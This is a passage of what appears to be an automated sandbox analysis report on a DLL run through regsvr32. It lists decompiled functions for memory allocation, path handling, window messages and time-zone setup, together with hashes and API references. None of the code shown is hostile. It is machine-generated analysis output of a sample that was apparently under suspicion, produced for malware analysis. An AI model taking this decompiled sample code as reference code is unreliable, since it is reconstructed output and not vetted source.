                                                                          • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocH_prolog
                                                                        • String ID:
                                                                        • API String ID: 3910492588-0
                                                                        • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                        • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 287 100045d0-100045ea VirtualAlloc
                                                                        C-Code - Quality: 100%
                                                                        			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
                                                                        				void* _t7;
                                                                        
                                                                        				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
                                                                        				return _t7;
                                                                        			}




                                                                        0x100045e4
                                                                        0x100045ea

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 100045E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                        • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 288 100045f0-10004605 VirtualFree
                                                                        C-Code - Quality: 100%
                                                                        			E100045F0(void* _a4, long _a8, long _a12) {
                                                                        				int _t5;
                                                                        
                                                                        				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                        				return _t5;
                                                                        			}




                                                                        0x100045ff
                                                                        0x10004605

                                                                        APIs
                                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                        • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002592C(void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t33;
                                                                        				long _t35;
                                                                        				intOrPtr* _t36;
                                                                        				void* _t43;
                                                                        				void* _t49;
                                                                        				CHAR* _t69;
                                                                        				void* _t74;
                                                                        				void* _t76;
                                                                        
                                                                        				E10011BF0(0x1003acd2, _t76);
                                                                        				_t33 =  *0x1004c470; // 0x303bb91f
                                                                        				_t69 =  *(_t76 + 8);
                                                                        				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
                                                                        				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
                                                                        				if(_t35 != 0) {
                                                                        					if(_t35 < 0x104) {
                                                                        						_t36 = E100243B2();
                                                                        						_t67 =  *_t36;
                                                                        						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
                                                                        						 *((intOrPtr*)(_t76 - 4)) = 0;
                                                                        						E100258EA(0, _t69, _t76 + 8);
                                                                        						if(PathIsUNCA( *(_t76 + 8)) != 0) {
                                                                        							L15:
                                                                        							_t74 = 1;
                                                                        						} else {
                                                                        							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
                                                                        								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
                                                                        									CharUpperA(_t69);
                                                                        								}
                                                                        								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
                                                                        									goto L15;
                                                                        								} else {
                                                                        									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
                                                                        									if(_t49 == 0xffffffff) {
                                                                        										goto L15;
                                                                        									} else {
                                                                        										FindClose(_t49);
                                                                        										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
                                                                        											goto L6;
                                                                        										} else {
                                                                        											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								L6:
                                                                        								_t74 = 0;
                                                                        							}
                                                                        						}
                                                                        						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
                                                                        						_t43 = _t74;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        				} else {
                                                                        					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
                                                                        					L3:
                                                                        					_t43 = 0;
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                                        				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
                                                                        			}












                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025931
                                                                        • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                          • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                          • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                        • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                        • CharUpperA.USER32(?), ref: 100259DD
                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                        • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                        • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                        • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 4080879615-0
                                                                        • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                        • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				signed int _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr* _v20;
                                                                        				struct tagPOINT _v28;
                                                                        				intOrPtr _v40;
                                                                        				signed char _v69;
                                                                        				char _v76;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t62;
                                                                        				intOrPtr _t68;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t77;
                                                                        				short _t78;
                                                                        				short _t85;
                                                                        				short _t90;
                                                                        				intOrPtr _t109;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t114;
                                                                        				intOrPtr* _t116;
                                                                        
                                                                        				_t113 = _a4;
                                                                        				_t116 = __ecx;
                                                                        				if(E10020B0B(__ecx, _t113) != 0) {
                                                                        					L37:
                                                                        					return 1;
                                                                        				}
                                                                        				_t114 =  *((intOrPtr*)(_t113 + 4));
                                                                        				_v20 = E10008325(__ecx);
                                                                        				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
                                                                        					if(_t114 < 0x200 || _t114 > 0x209) {
                                                                        						if(_t114 < 0xa0 || _t114 > 0xa9) {
                                                                        							goto L30;
                                                                        						} else {
                                                                        							goto L8;
                                                                        						}
                                                                        					} else {
                                                                        						L8:
                                                                        						_v16 = E100373DB();
                                                                        						_t70 = _a4;
                                                                        						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
                                                                        						_v28.x =  *(_t70 + 0x14);
                                                                        						ScreenToClient( *(_t116 + 0x1c),  &_v28);
                                                                        						E10011C50( &_v76, 0, 0x30);
                                                                        						_v76 = 0x28;
                                                                        						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
                                                                        						_t128 = _v40 - 0xffffffff;
                                                                        						_v8 = _t77;
                                                                        						if(_v40 != 0xffffffff) {
                                                                        							_push(_v40);
                                                                        							E100107C8(0x201, _t114, _t116, _t128);
                                                                        						}
                                                                        						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
                                                                        							_v12 = _v12 & 0x00000000;
                                                                        							__eflags = _t114 - 0x201;
                                                                        							if(_t114 != 0x201) {
                                                                        								_t90 = GetKeyState(1);
                                                                        								__eflags = _t90;
                                                                        								if(_t90 < 0) {
                                                                        									_v8 =  *((intOrPtr*)(_v16 + 0x78));
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_v12 = 1;
                                                                        						}
                                                                        						if(_v8 < 0 || _v12 != 0) {
                                                                        							_t78 = GetKeyState(1);
                                                                        							__eflags = _t78;
                                                                        							if(_t78 >= 0) {
                                                                        								L28:
                                                                        								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                        								KillTimer( *(_t116 + 0x1c), 0xe001);
                                                                        								goto L29;
                                                                        							}
                                                                        							__eflags = _v12;
                                                                        							if(_v12 == 0) {
                                                                        								goto L29;
                                                                        							}
                                                                        							goto L28;
                                                                        						} else {
                                                                        							if(_t114 != 0x202) {
                                                                        								__eflags =  *(_t116 + 0x78) & 0x00000008;
                                                                        								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
                                                                        									L25:
                                                                        									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
                                                                        									L29:
                                                                        									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
                                                                        									goto L30;
                                                                        								}
                                                                        								_t85 = GetKeyState(1);
                                                                        								__eflags = _t85;
                                                                        								if(_t85 < 0) {
                                                                        									goto L25;
                                                                        								}
                                                                        								_t109 = _v16;
                                                                        								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
                                                                        								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
                                                                        									goto L29;
                                                                        								}
                                                                        								_push(0x12c);
                                                                        								_push(0xe000);
                                                                        								L24:
                                                                        								E1002F4CC(_t116);
                                                                        								goto L29;
                                                                        							}
                                                                        							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                        							_push(0xc8);
                                                                        							_push(0xe001);
                                                                        							goto L24;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					L30:
                                                                        					_t62 = E10022AD5(_t116);
                                                                        					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
                                                                        						if(_v20 == 0) {
                                                                        							L35:
                                                                        							if(IsWindow( *(_t116 + 0x1c)) == 0) {
                                                                        								goto L38;
                                                                        							}
                                                                        							return E10021527(_a4);
                                                                        						} else {
                                                                        							goto L33;
                                                                        						}
                                                                        						while(1) {
                                                                        							L33:
                                                                        							_t115 = _v20;
                                                                        							_push(_a4);
                                                                        							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
                                                                        								goto L37;
                                                                        							}
                                                                        							_t68 = E10022A96(_t115);
                                                                        							_v20 = _t68;
                                                                        							if(_t68 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L35;
                                                                        						}
                                                                        						goto L37;
                                                                        					} else {
                                                                        						L38:
                                                                        						__eflags = 0;
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}


























                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: State$ClientKillParentScreenTimerWindow
                                                                        • String ID: (
                                                                        • API String ID: 1540673551-3887548279
                                                                        • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                        • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				int _t21;
                                                                        				long _t22;
                                                                        				char* _t24;
                                                                        				signed int _t26;
                                                                        				signed int _t27;
                                                                        				int _t29;
                                                                        				char* _t30;
                                                                        				int _t32;
                                                                        				char* _t33;
                                                                        				char* _t34;
                                                                        				char* _t35;
                                                                        				int _t36;
                                                                        				int _t39;
                                                                        				int _t41;
                                                                        				int _t44;
                                                                        				char* _t48;
                                                                        				signed int _t49;
                                                                        				void* _t51;
                                                                        				int _t52;
                                                                        				signed int _t54;
                                                                        				void* _t56;
                                                                        				void* _t58;
                                                                        				int _t60;
                                                                        				int _t63;
                                                                        				void* _t75;
                                                                        				void* _t76;
                                                                        				void* _t77;
                                                                        				signed int _t82;
                                                                        				char* _t87;
                                                                        				int _t89;
                                                                        				void* _t90;
                                                                        
                                                                        				_push(0x18);
                                                                        				_push(0x10042cd0);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				 *(_t90 - 0x20) = 0;
                                                                        				E10013A38(__ebx, 0, 7);
                                                                        				 *(_t90 - 4) = 0;
                                                                        				_t63 =  *0x1004f734; // 0x0
                                                                        				 *(_t90 - 0x28) = _t63;
                                                                        				 *0x1004f814 = 0;
                                                                        				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
                                                                        				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
                                                                        				_t87 = E1001ADE6(0x10042ccc);
                                                                        				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
                                                                        				if(_t87 == 0 ||  *_t87 == 0) {
                                                                        					_t21 =  *0x1004f818; // 0x0
                                                                        					__eflags = _t21;
                                                                        					if(__eflags != 0) {
                                                                        						_push(_t21);
                                                                        						E100107C8(_t63, 0, _t87, __eflags);
                                                                        						 *0x1004f818 = 0;
                                                                        					}
                                                                        					_t22 = GetTimeZoneInformation(0x1004f768);
                                                                        					__eflags = _t22 - 0xffffffff;
                                                                        					if(_t22 == 0xffffffff) {
                                                                        						goto L31;
                                                                        					} else {
                                                                        						 *0x1004f814 = 1;
                                                                        						_t26 = 0x1004f768->Bias; // 0x0
                                                                        						_t27 = _t26 * 0x3c;
                                                                        						 *0x1004cde8 = _t27;
                                                                        						__eflags =  *0x1004f7ae; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							_t82 =  *0x1004f7bc; // 0x0
                                                                        							_t39 = _t27 + _t82 * 0x3c;
                                                                        							__eflags = _t39;
                                                                        							 *0x1004cde8 = _t39;
                                                                        						}
                                                                        						__eflags =  *0x1004f802; // 0x0
                                                                        						if(__eflags == 0) {
                                                                        							L22:
                                                                        							 *0x1004cdec = 0;
                                                                        							 *0x1004cdf0 = 0;
                                                                        							goto L23;
                                                                        						} else {
                                                                        							_t36 =  *0x1004f810; // 0x0
                                                                        							__eflags = _t36;
                                                                        							if(_t36 == 0) {
                                                                        								goto L22;
                                                                        							}
                                                                        							 *0x1004cdec = 1;
                                                                        							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
                                                                        							L23:
                                                                        							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
                                                                        							__eflags = _t29;
                                                                        							if(_t29 == 0) {
                                                                        								L26:
                                                                        								_t30 =  *0x1004ce78; // 0x1004cdf8
                                                                        								 *_t30 = 0;
                                                                        								L27:
                                                                        								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
                                                                        								__eflags = _t32;
                                                                        								if(_t32 == 0) {
                                                                        									L30:
                                                                        									_t33 =  *0x1004ce7c; // 0x1004ce38
                                                                        									 *_t33 = 0;
                                                                        									goto L31;
                                                                        								}
                                                                        								__eflags =  *(_t90 - 0x1c);
                                                                        								if( *(_t90 - 0x1c) != 0) {
                                                                        									goto L30;
                                                                        								}
                                                                        								_t34 =  *0x1004ce7c; // 0x1004ce38
                                                                        								_t34[0x3f] = 0;
                                                                        								goto L31;
                                                                        							}
                                                                        							__eflags =  *(_t90 - 0x1c);
                                                                        							if( *(_t90 - 0x1c) != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_t35 =  *0x1004ce78; // 0x1004cdf8
                                                                        							_t35[0x3f] = 0;
                                                                        							goto L27;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t41 =  *0x1004f818; // 0x0
                                                                        					if(_t41 == 0) {
                                                                        						L6:
                                                                        						_t44 = E100107B6(E10011820(_t87) + 1);
                                                                        						 *0x1004f818 = _t44;
                                                                        						if(_t44 == 0) {
                                                                        							L31:
                                                                        							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
                                                                        							L47:
                                                                        							return E1001254F(_t24);
                                                                        						}
                                                                        						E10017B90(_t44, _t87);
                                                                        						_pop(_t75);
                                                                        						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
                                                                        						E1001902F();
                                                                        						E10019E20( *0x1004ce78, _t87, 3);
                                                                        						_t48 =  *0x1004ce78; // 0x1004cdf8
                                                                        						_t48[3] = 0;
                                                                        						_t89 = _t87 + 3;
                                                                        						if( *_t89 == 0x2d) {
                                                                        							 *(_t90 - 0x20) = 1;
                                                                        							_t89 = _t89 + 1;
                                                                        						}
                                                                        						_t49 = E10012749(_t63, _t75, _t90, _t89);
                                                                        						_pop(_t76);
                                                                        						 *0x1004cde8 = _t49 * 0xe10;
                                                                        						while(1) {
                                                                        							_t51 =  *_t89;
                                                                        							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
                                                                        								break;
                                                                        							}
                                                                        							_t89 = _t89 + 1;
                                                                        						}
                                                                        						__eflags =  *_t89 - 0x3a;
                                                                        						if( *_t89 != 0x3a) {
                                                                        							L42:
                                                                        							__eflags =  *(_t90 - 0x20);
                                                                        							if( *(_t90 - 0x20) != 0) {
                                                                        								 *0x1004cde8 =  ~( *0x1004cde8);
                                                                        							}
                                                                        							_t52 =  *_t89;
                                                                        							 *0x1004cdec = _t52;
                                                                        							__eflags = _t52;
                                                                        							if(_t52 == 0) {
                                                                        								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                        								 *_t24 = 0;
                                                                        							} else {
                                                                        								E10019E20( *0x1004ce7c, _t89, 3);
                                                                        								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                        								_t24[3] = 0;
                                                                        							}
                                                                        							goto L47;
                                                                        						}
                                                                        						_t89 = _t89 + 1;
                                                                        						_t54 = E10012749(0x30, _t76, _t90, _t89);
                                                                        						_pop(_t77);
                                                                        						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
                                                                        						while(1) {
                                                                        							_t56 =  *_t89;
                                                                        							__eflags = _t56 - 0x30;
                                                                        							if(_t56 < 0x30) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags = _t56 - 0x39;
                                                                        							if(_t56 > 0x39) {
                                                                        								break;
                                                                        							}
                                                                        							_t89 = _t89 + 1;
                                                                        							__eflags = _t89;
                                                                        						}
                                                                        						__eflags =  *_t89 - 0x3a;
                                                                        						if( *_t89 != 0x3a) {
                                                                        							goto L42;
                                                                        						}
                                                                        						_t89 = _t89 + 1;
                                                                        						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
                                                                        						while(1) {
                                                                        							_t58 =  *_t89;
                                                                        							__eflags = _t58 - 0x30;
                                                                        							if(_t58 < 0x30) {
                                                                        								goto L42;
                                                                        							}
                                                                        							__eflags = _t58 - 0x39;
                                                                        							if(_t58 > 0x39) {
                                                                        								goto L42;
                                                                        							}
                                                                        							_t89 = _t89 + 1;
                                                                        							__eflags = _t89;
                                                                        						}
                                                                        						goto L42;
                                                                        					}
                                                                        					if(E10016D00(_t87, _t41) == 0) {
                                                                        						goto L31;
                                                                        					} else {
                                                                        						_t60 =  *0x1004f818; // 0x0
                                                                        						_t99 = _t60;
                                                                        						if(_t60 != 0) {
                                                                        							_push(_t60);
                                                                        							E100107C8(_t63, 0, _t87, _t99);
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        				}
                                                                        			}



































                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10018E27
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • _strlen.LIBCMT ref: 10018E99
                                                                        • _strncpy.LIBCMT ref: 10018ECF
                                                                          • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
                                                                        • String ID:
                                                                        • API String ID: 634650903-0
                                                                        • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                        • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E10032A2D(void* __ecx, signed int _a4, long _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				long _t24;
                                                                        				void* _t29;
                                                                        				int _t32;
                                                                        				struct HWND__* _t36;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t29 = __ecx;
                                                                        				if(GetKeyState(0x11) < 0) {
                                                                        					_push(8);
                                                                        					_pop(0);
                                                                        				}
                                                                        				if(GetKeyState(0x10) < 0) {
                                                                        					_push(4);
                                                                        					_pop(0);
                                                                        				}
                                                                        				_t36 = GetFocus();
                                                                        				_v8 = GetDesktopWindow();
                                                                        				if(_t36 != 0) {
                                                                        					_t32 = _a4 << 0x10;
                                                                        					do {
                                                                        						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
                                                                        						_t36 = GetParent(_t36);
                                                                        					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
                                                                        				} else {
                                                                        					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                                                        				}
                                                                        				return _t24;
                                                                        			}








                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
